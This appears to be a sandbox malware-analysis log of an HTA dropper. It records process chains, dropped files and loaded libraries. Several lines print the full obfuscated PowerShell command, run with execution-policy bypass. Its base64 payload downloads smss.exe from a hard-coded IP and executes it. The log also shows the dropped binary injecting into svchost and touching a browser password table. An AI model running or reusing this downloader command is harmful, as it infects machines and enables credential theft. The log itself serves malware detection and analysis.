Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 6_2_00A787E1
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 6_2_00A8B3FB
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A9EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 6_2_00A9EE0D
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A983BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 6_2_00A983BB
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A24E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 6_2_00A24E89
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\smss[1].exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pqumonhs.owr.ps1 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: AtBroker.exe, 0000000C.00000003.1987792478.0000000003114000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.2696221255.0000000003164000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000003.1992625129.0000000003141000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000003.1987927885.0000000003135000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.2696221255.0000000003135000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: givemebestthingsforgivemebest.hta ReversingLabs: Detection: 25%
Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\givemebestthingsforgivemebest.hta"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y35p2qjs\y35p2qjs.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES33B5.tmp" "c:\Users\user\AppData\Local\Temp\y35p2qjs\CSC581F3FC65DCD49069962404E1D830F5.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\smss.exe "C:\Users\user\AppData\Roaming\smss.exe"
Source: C:\Users\user\AppData\Roaming\smss.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\smss.exe"
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
Source: C:\Windows\SysWOW64\AtBroker.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\backgroundTaskHost.exe "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y35p2qjs\y35p2qjs.cmdline" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\smss.exe "C:\Users\user\AppData\Roaming\smss.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES33B5.tmp" "c:\Users\user\AppData\Local\Temp\y35p2qjs\CSC581F3FC65DCD49069962404E1D830F5.TMP" Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\smss.exe" Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe" Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: uxtheme.dll Jump to behavior
